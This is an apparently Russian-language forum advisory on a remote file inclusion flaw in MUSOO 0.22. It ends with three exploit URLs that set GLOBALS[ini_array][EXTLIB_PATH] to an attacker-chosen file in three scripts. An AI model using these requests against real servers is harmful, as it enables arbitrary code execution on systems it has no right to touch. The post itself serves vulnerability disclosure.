В этой теме нет ответов

[aka PSIH]

MUSOO 0.22, на других версиях не проверялось...

Уязвимость существует из-за недостаточной обработки входных данных в параметре "ini_array[EXTLIB_PATH]" в сценариях parameter in msDb.php, modules/MusooTemplateLite.php и modules/SoundImporter.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP.

exp:

http://[host]/msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=[file]
http://[host]/modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=[file]
http://[host]/modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=[file]